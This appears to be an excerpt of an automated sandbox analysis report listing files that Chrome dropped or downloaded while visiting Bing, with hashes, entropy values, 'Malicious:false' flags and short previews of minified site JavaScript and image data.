                                                                                                    Entropy (8bit):5.24528911504239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                    MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                    SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                    SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                                                    SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/No5xIZMVh9KdmI4bjLD9p4Xl0Ys.js
                                                                                                    Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (37756), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37756
                                                                                                    Entropy (8bit):5.5286674347569065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:6jiIrpis31lUc4jzmU62pffR75Ql+HCmEOO8C0EBNrpA23/H8tQJ1CN9MQWt3/p9:6Ph31SUA15u+QvctMxbMVX5Xu
                                                                                                    MD5:423885818D67BFCF00E21BE13F6F3A71
                                                                                                    SHA1:A79144758AF1204BB161FCD79E74C1F692AFB7A5
                                                                                                    SHA-256:5BB552BEB00AF20A3A39660DECABBA8520CF53FF43594D1CD923F9217081D169
                                                                                                    SHA-512:99343F25EC96FE803D57A1787CEFF649A5350DE6E5624990214D604CDD6CB3A4C5A8C069A024712C83E70AB91424AC1AC1F7D3C7E16F9FD498342C46DED593A2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:!function(){const noop=()=>{},optionsScript=document.querySelector("script[type=esms-options]"),esmsInitOptions=optionsScript?JSON.parse(optionsScript.innerHTML):{};Object.assign(esmsInitOptions,self.esmsInitOptions||{});let shimMode=!!esmsInitOptions.shimMode;const importHook=globalHook(shimMode&&esmsInitOptions.onimport),resolveHook=globalHook(shimMode&&esmsInitOptions.resolve);let fetchHook=esmsInitOptions.fetch?globalHook(esmsInitOptions.fetch):fetch;const metaHook=esmsInitOptions.meta?globalHook(shimModule&&esmsInitOptions.meta):noop,skip=esmsInitOptions.skip?new RegExp(esmsInitOptions.skip):null;let nonce=esmsInitOptions.nonce;const mapOverrides=esmsInitOptions.mapOverrides;if(!nonce){const nonceElement=document.querySelector("script[nonce]");nonceElement&&(nonce=nonceElement.nonce||nonceElement.getAttribute("nonce"))}const onerror=globalHook(esmsInitOptions.onerror||noop),onpolyfill=esmsInitOptions.onpolyfill?globalHook(esmsInitOptions.onpolyfill):()=>{console.log("%c^^ Module T
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x1080, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):610999
                                                                                                    Entropy (8bit):7.973780792700858
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:EBi5F4tzsVwFvwgUUppS+01mTPue7ad3+Gzne5jbw7z62:cUFIzgwFYgU6OmT2ek3+GjMc62
                                                                                                    MD5:A9ED1C74A021494A48B8E524DBE1B2D1
                                                                                                    SHA1:4E2C1C046EB70BFC890855C2A3C4C48EE30B76E6
                                                                                                    SHA-256:6757B53C0ED4FC376B2F53949C638352A821A19249885DB615914EF364550C67
                                                                                                    SHA-512:DDF9AD12DB6FBA6D9306E7CC745A0A509AD51B3E66F84F119DC14B9C542AB389AF17E714A63B43C4D4775E01B70E28E65FEB11B8EC655E40F85B8166462E6700
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/TiwcBG63C_yJCFXCo8TEjuMLduY.jpg
                                                                                                    Preview:......Exif..II*.................Ducky.......P.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.eda2b3fac, 2021/11/17-17:23:19 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.1 (Macintosh)" xmpMM:InstanceID="xmp.iid:078568F9861D11EC892BD147E2A71139" xmpMM:DocumentID="xmp.did:078568FA861D11EC892BD147E2A71139"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:078568F7861D11EC892BD147E2A71139" stRef:documentID="xmp.did:078568F8861D11EC892BD147E2A71139"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................................................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1949), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1949
                                                                                                    Entropy (8bit):5.088143640620333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:koktAKpA72dVRZoSGIAfAoPk0+qhn4bgLTBhzECkVlpjw4on:kJ3i2oV/h+mTkTdon
                                                                                                    MD5:718C9D9C2D2A498DE3C6953B6347A22F
                                                                                                    SHA1:B2F1A5400618972690D509E970CC3ABEB72513F4
                                                                                                    SHA-256:66133F155E3A433E9EECA08DFC3B4E225D358E1A89AB0665379EFF319F9F0081
                                                                                                    SHA-512:AC55EF9F45D29CFCF7D80C009DF4C55335F7C3B55D66AADDE275F580F321125A2C7669F7157D5BF9A34B3513C1231935A461F46EEEBDD87B7801685FC95DC6C3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/svGlQAYYlyaQ1QnpcMw6vrclE_Q.js
                                                                                                    Preview:var Pager;(function(n){function f(n,r,u,f,e,o,s,h,c){if(t[n])return t[n];var l=new i(n,r,u,f,e,o,s,h,c);return t[n]=l,l}var u=0,r="active",i=function(){function n(n,t,i,r,f,e,o,s,h){var a=this,v=_ge(n),c,l,y;if(v){if(this.pager=v,this.controlId=t,this.pagerLabels=o,this.activeIndex=s>=0?s:u,this.enableDots=h,this.enableDots)for(c=0;c<i;++c)l=this.getDot(c),l&&(l.pagerindex=c,sj_be(l,"click",function(n){r&&sj_evt.fire("slideexp_slidetoindex",a.controlId,n.target.pagerindex);Log.Log("Click","Pager","ID"+n.target.pagerindex,!1)}));e&&(y=_ge(this.pager.id+"_pager_seemore"),Lib.CssClass.add(y,"enable_fade"),Lib.CssClass.add(v,"enable_fade"),Lib.CssClass.add(y,"pager_seemore_hidden"));sj_evt.bind("pager_updateindex",function(n){if(a.isForMe(n)){var t=n[2];a.updatePager(t,i,f,e)}})}}return n.prototype.getDot=function(n){var t=this.pager.firstElementChild;return t.children[n]},n.prototype.getActiveNode=function(){return this.pager.firstElementChild},n.prototype.updatePager=function(n,t,i,u){va
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 84 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1255
                                                                                                    Entropy (8bit):7.72475662763531
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:fx/GuCVKFPPytC3f3s7TxRwJREUccN+hJ9D3pSTYJmda/hRPbkGcrBvhuL3OT9uc:5/GtkFPqtif87TxRwJRBccN+h9Jmdapg
                                                                                                    MD5:3E1CD2137A9811B978568392430CCC51
                                                                                                    SHA1:8D204356B7D8CD228FAE858236237374836B3703
                                                                                                    SHA-256:5DEF3FAF3461305079A86BB0306F487462C2C96EEB4E68F476163AD4DC8EBE80
                                                                                                    SHA-512:AFB622767F578E2C40537B445BFEC837D969E185D3DAC37F14057512B1B36CC133DA6F69D6A45FF2B7094D22C1879511E9EEF7AF45952428B79A5B88DEF2B08A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...T............[....sRGB.........gAMA......a.....pHYs..........o.d...|IDATXG.y..E...oV.y...j.x.E..%.J."...h$.%..VP.P.x..H......."$."ea.F.)..Ei.i>..~sX~o.G D.x.....5[A5pI....]m.Z..z!J.>....6>.T:..'..i[.yT.E...B..A..(....b...8..+m@u.?<.....:.P.<{.Tn...l{......X....P...\X.. ..w...`...&p..........)..*....M..X./..6.{!..~..#....8..............Cp.~..h.'.y\.r...5`.$P..Z.'.:{.........P.8......;h.}.}8v/8.+h.S.s..k.._.*p..a..|.^~.........l..>/........`t.q.\....o...=<_....a2...A.!:.._.aP.&.......S.5.A~[Y.:.^.tn..,".U..4....T..:.~.o+.........c....v.[p.....`..=.='=.d~.ye9...m@.J...5.....Y.....]._B.zV..=..t.).....m6...S.z...j.=...4V|k..i>o...)..A.iP...3a.hD3....G8...s...!..#.....\.e.Zg}.....IL..0...}..^...4......f.?.*R.6....b...a...Z..7.T5..f...X........#3.y.e.Tyo.....Q...AV[M..f.E...N..x.Y.\...A..&p..|............S@.2....`......E..f...U8VY/Mc..h.......#.,.`..58.57j.eBt.ky...p.W.y...f.%.........qY..9.7<.....W..(#...t...`.Yk...D.`......).
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3100
                                                                                                    Entropy (8bit):7.872020866900709
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9xFuERARvGnYWxJ+uhjIuWaO0ndzJ96OnBDmEf64HcAx/DyxiQAz8:TME+GDxDjFndzpBN643BOBAz8
                                                                                                    MD5:3756C922477C664DF6CAAC4766DDC6A5
                                                                                                    SHA1:E3245B51E1F0E6F0289B70318FFD903DA2A61622
                                                                                                    SHA-256:345B852C936D230339E7559265F0BF40ACB3A8BDCC17244FE14D1B161D87A5CE
                                                                                                    SHA-512:E11E5F438716DC2365B528F02FD72195940359558A11D3CE696B6465F93D2BE069172308604A04CE80596971FA8217012CC6B15F1464659BF6391C17A0249EDF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=OVFT.9I1YmRmMwIiBU6x3v_jx3i&pid=News&w=80&h=80&c=14&rs=2&qlt=90
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..:...[.+:....l[..h.O...v....A...:sY7v...o:..#.Hh....s...../.e.|.. F\. .@.<{q....-..*....m..pW.......W...Z....j.}......b.!...t.i.d..U..=..M..H/".H...(N7.L...../<\..v-k........9..U.:..2mi.]..w.-/e..[..-...%.G.J.j)q=..w......U.t..vk..*.....S.9...J..`...r;....@...u.cF...3P..;..:.p..C.Q.i...........7..{9r.........#.,.n...,.K0...Z..O.Ec&.$..^.....O...S.-.047..Y
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (6526), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6526
                                                                                                    Entropy (8bit):5.372135202911853
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/CaRENlgVMJhPbrtwyGBdnxEd7NUCuf1bx6gqkJD:aaREXPbOLdxEd7NUnf1twI
                                                                                                    MD5:6904ABA1CE02BB3A01B6550C4BF98A7E
                                                                                                    SHA1:858127221DAF72534247D665BE661A175FAD6DD6
                                                                                                    SHA-256:4492B7EF7F9E30168D8F6410FF6928FCC3019618019116F82B25459B9267B038
                                                                                                    SHA-512:EBD259047BCDED6F925C3184A27D0D197D48B0EE3EBC2C12A27A2C9843B08C551D6DC34C299CD6E4931446F33C1D6BFF3F8CDEB018FB6C614671CF43B6497585
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var WebResultToolboxBlueV2;(function(){function tt(){var n=_ge("b_results"),t=_ge("b_context");(n||t)&&typeof sa_CTBConfig!="undefined"&&sa_CTBConfig&&(r[b]=ot,r[k]=l,r[d]=l,r[g]=c,r[nt]=c,sj_be(sj_b,"click",function(n){u(n)}),sj_evt.bind("onPopTR",function(n){u(n,!0)}),sj_be(sj_b,"mousedown",function(n){h(n)}),sj_be(sj_b,"mouseup",function(n){h(n)}),n&&s(n.firstChild),t&&s(t.firstChild))}function it(n){return _G.abdef_sarc!=undefined&&n.classList.contains(_G.abdef_sarc)}function s(n){n&&n.nodeType==1&&!it(n)&&(ut(n),s(n.nextSibling))}function rt(n,t,i){for(var r=-1;i--&&r++<n.length;)if(r=n.indexOf(t,r),r<0)break;return r}function ut(n){var y,u,t,c,f,s,l,a;if(n){var r=ct(sa_CTBConfig.toolboxTriggerClassName,n,"span"),h=n.getElementsByTagName("cite"),e=v(n,"u");e&&i(e,"u")[0]==="e"&&(e=null);y=sa_CTBConfig&&sa_CTBConfig.disableMetaData=="1";r&&(h.length||y)&&(u=h.length>0?h[0]:null,n.tt=r,ft(n,e)&&bt(n)&&(t=sj_ce("a"),t.href="#",t.className="trgr_icon",t.setAttribute("aria-label",sa_CT
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8674
                                                                                                    Entropy (8bit):5.212727429542033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                                                    MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                                                    SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                                                    SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                                                    SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(n,t,i,r,u,f,e,o,s){function w(n,t,i){var r=[],u;return n&&(i=i||"*",u=n.getElementsByTagName(i),h(u,function(n){nt(n,t)&&r.push(n)})),r}function b(n,t,i){var r=[];return h(n,function(n){var u=w(n,t,i);u&&u.length>0&&(r=r.concat(u))}),r}function bt(n,t){var i=[];return h(n,function(n){var r=null;try{r=n.querySelector(t)}finally{r&&(i=i.concat(r))}}),i}function ut(n){return g[n]||(g[n]=new RegExp("\\b"+n+"\\b")),g[n]}function nt(n,t){var i=n.className||"";return ut(t).test(i)}function y(n,t){n.className=n.className||"";nt(n,t)||(n.className+=" "+t)}function p(n,t){var i=n.className||"",r=ut(t);n&&i&&t&&(n.className=n.className.replace(r,"").replace(/\s+/," "))}function a(n){return f(n),u(n),!1}function kt(n){return(n=n||i.event,n.pageX||n.pageY)?{x:n.pageX,y:n.pageY}:{x:n.clientX+s.scrollLeft-s.clientLeft,y:n.clientY+s.scrollTop-s.clientTop}}function c(n,t){var i=n.currentStyle,r=0,u;return _w.getComputedStyle&&(i=_w.getComputedStyle(n),sb_ie&&(r=parseFloat(i.paddingTop)+parseF
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (674), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):674
                                                                                                    Entropy (8bit):5.239693493116514
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                                                    MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                                                    SHA1:F486B2745E4637D881422D38C7780C041618168A
                                                                                                    SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                                                    SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):71742
                                                                                                    Entropy (8bit):5.277506917689889
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:kde0TbABO50ORdcE2J1Et7vxBzcJnlOkcvwjuDF8B2SJpgp7Fer+3xQi9tlh93lq:Wc5l/jZPTeQ633t13O3xAOn88HFTH19
                                                                                                    MD5:86812D7819DF69824CCA82F9B8777569
                                                                                                    SHA1:E5777AA2821AE8DD81BFF80E7B508BB350E4F80F
                                                                                                    SHA-256:52C1FD3CBE9324FFA8DF105F5D126712F5A9FBE324C6A8B5A27993F8609DD0FA
                                                                                                    SHA-512:0E875D151AC464D2E98FF55482EB64029E5787DB7E5E014D95799944523BEF13FA9660156C5DFAB71A534FF1B27B53BDB3778F7FB3553FBF6C70A6E5D054BB8E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/5Xd6ooIa6N2Bv_gOe1CLs1Dk-A8.js
                                                                                                    Preview:define("Types/SuggestionTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.SuggestionExpansionType=void 0;var i;(function(n){n[n.NO_EXPANSION=0]="NO_EXPANSION";n[n.REQUERY_EXPANSION=1]="REQUERY_EXPANSION";n[n.ZIS_EXPANSION=2]="ZIS_EXPANSION";n[n.QF_EXPANSION=3]="QF_EXPANSION"})(i=t.SuggestionExpansionType||(t.SuggestionExpansionType={}))});define("Types/CoreTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0})});define("Utilities/SuggestionUtilities",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.combinePSCSuggestions=t.storePSCSuggestions=t.updateCvidInSuggestion=t.escapeHTML=t.processSuggestionResponse=t.setPanelValue=t.createSuggestionBlock=t.isUserSignedIn=t.hasHistorySuggestion=t.onClickHandler=t.updateSearchBoxValueOnHover=t.getNextSelectedSuggestion=t.getHValueFromId=t.convertHighlightedQueryToPlainQuery=t.convertHighligh
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1949), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1949
                                                                                                    Entropy (8bit):5.088143640620333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:koktAKpA72dVRZoSGIAfAoPk0+qhn4bgLTBhzECkVlpjw4on:kJ3i2oV/h+mTkTdon
                                                                                                    MD5:718C9D9C2D2A498DE3C6953B6347A22F
                                                                                                    SHA1:B2F1A5400618972690D509E970CC3ABEB72513F4
                                                                                                    SHA-256:66133F155E3A433E9EECA08DFC3B4E225D358E1A89AB0665379EFF319F9F0081
                                                                                                    SHA-512:AC55EF9F45D29CFCF7D80C009DF4C55335F7C3B55D66AADDE275F580F321125A2C7669F7157D5BF9A34B3513C1231935A461F46EEEBDD87B7801685FC95DC6C3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var Pager;(function(n){function f(n,r,u,f,e,o,s,h,c){if(t[n])return t[n];var l=new i(n,r,u,f,e,o,s,h,c);return t[n]=l,l}var u=0,r="active",i=function(){function n(n,t,i,r,f,e,o,s,h){var a=this,v=_ge(n),c,l,y;if(v){if(this.pager=v,this.controlId=t,this.pagerLabels=o,this.activeIndex=s>=0?s:u,this.enableDots=h,this.enableDots)for(c=0;c<i;++c)l=this.getDot(c),l&&(l.pagerindex=c,sj_be(l,"click",function(n){r&&sj_evt.fire("slideexp_slidetoindex",a.controlId,n.target.pagerindex);Log.Log("Click","Pager","ID"+n.target.pagerindex,!1)}));e&&(y=_ge(this.pager.id+"_pager_seemore"),Lib.CssClass.add(y,"enable_fade"),Lib.CssClass.add(v,"enable_fade"),Lib.CssClass.add(y,"pager_seemore_hidden"));sj_evt.bind("pager_updateindex",function(n){if(a.isForMe(n)){var t=n[2];a.updatePager(t,i,f,e)}})}}return n.prototype.getDot=function(n){var t=this.pager.firstElementChild;return t.children[n]},n.prototype.getActiveNode=function(){return this.pager.firstElementChild},n.prototype.updatePager=function(n,t,i,u){va
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (888), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):888
                                                                                                    Entropy (8bit):5.1970220185324045
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                                                    MD5:F1CF1909716CE3DA53172898BB780024
                                                                                                    SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                                                    SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                                                    SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function f(){var u=o(),i,t,f;if(u)for(i=s(u),t=0;t<i.length;t++)f=i[t].id.replace(n,""),Log&&Log.Log&&Log.Log("Info",r,f,!1,"Text",t.toString()),sj_be(i[t],"mousedown",e)}function e(t){var r=i(t.target),f;r!=null&&(f=r.id.replace(n,""),Log&&Log.Log&&Log.Log("Info",u,f))}function i(t){if(t!=null){var r=t.id;return r!=null&&r.indexOf(n)===0?t:i(t.parentElement)}return null}function o(){var n=_d.querySelectorAll(".b_scopebar > ul");return n&&n.length>0?n[0]:null}function s(i){for(var r,o,u=[],e=i.children,f=0;f<e.length;f++)r=e[f].id,r!=null&&r!==t&&r.indexOf(n)===0?u.push(e[f]):r!=null&&r===t&&(o=h(),u.push.apply(u,o));return u}function h(){var n=_d.querySelectorAll(".b_scopebar #b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item");return Array.prototype.slice.call(n)}var n="b-scopeListItem-",t=n+"menu",r="DynScopeRank",u="DynScopeClick";sj_evt.bind("onP1",f)})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):606
                                                                                                    Entropy (8bit):5.268639530160161
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                                                    MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                                                    SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                                                    SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                                                    SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",f=_w.location.search.substring(1),u=window.data_iid,r,t,e;i+=u&&u.length>0?"?IG="+_G.IG+"&IID="+u+"&"+f:"?"+f;r=window.rw_mqs_cg;r&&r.length>0&&(i+="&cg="+r,window.rw_mqs_cg=undefined);_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();e="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(document.body,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(e)}
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):5382
                                                                                                    Entropy (8bit):5.185593249825311
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+tRTfT8YGRHT8YevFBcD07Fr09gp0r9whm:u578YEz8Y6FM0J0A0hwI
                                                                                                    MD5:29C72D6678825B223DF6D27E76F37793
                                                                                                    SHA1:234A2A2FA2A5C5083A7D33947F4CE0B435E28B43
                                                                                                    SHA-256:704C299DA34555B2FA12DBC731343FAEE412555AD31339C15D7B07CB91C3C14E
                                                                                                    SHA-512:955E78E57C48938204822EA23B3F65A35ACCA9CCCAC5A651820835A6EE0FC0DF81B4B8CC9818B988A46CF13FEA63A5934E054DCEFFF364840BDD332D0D809748
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/I0oqL6KlxQg6fTOUf0zgtDXii0M.svg
                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" fill="none" xmlns:v="https://vecta.io/nano"><style><![CDATA[.B{color-interpolation-filters:sRGB}.C{flood-opacity:0}.D{stroke-width:1.333}.E{stroke-linecap:round} </style><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" fill="#fff"/><rect x=".25" y=".25" width="23.5" height="23.5" rx="11.75" stroke="#e5e5e5" stroke-width=".5"/><g filter="url(#C)"><g clip-path="url(#M)"><g clip-path="url(#N)"><path d="M4.333 7.001c0-.368.298-.667.667-.667h14c.368 0 .667.298.667.667v10a3 3 0 0 1-3 3H7.333a3 3 0 0 1-3-3v-10z" fill="url(#G)"/><mask id="A" maskUnits="userSpaceOnUse" x="4" y="6" width="16" height="14" mask-type="alpha"><path d="M4.334 6.999c0-.368.298-.667.667-.667h14c.368 0 .667.298.667.667v10a3 3 0 0 1-3 3H7.333a3 3 0 0 1-3-3v-10z" fill="url(#H)"/></mask><g mask="url(#A)" class="D E"><g filter="url(#D)"><path d="M8.00024 6.99935V4.66602H16.0002V6.99935" stroke="url(#I)"/></
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (22037)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22068
                                                                                                    Entropy (8bit):5.358666618759019
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Kh4kT1lYxfqyDOkKMpWMEQNhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzuer:Y5TifhLbBpBnqIH+Z6sepXv0uQaV
                                                                                                    MD5:DDD23E100A6474A6E64856960BF087EE
                                                                                                    SHA1:719A7078B66F5211032106665C77FAF7EDA99BDA
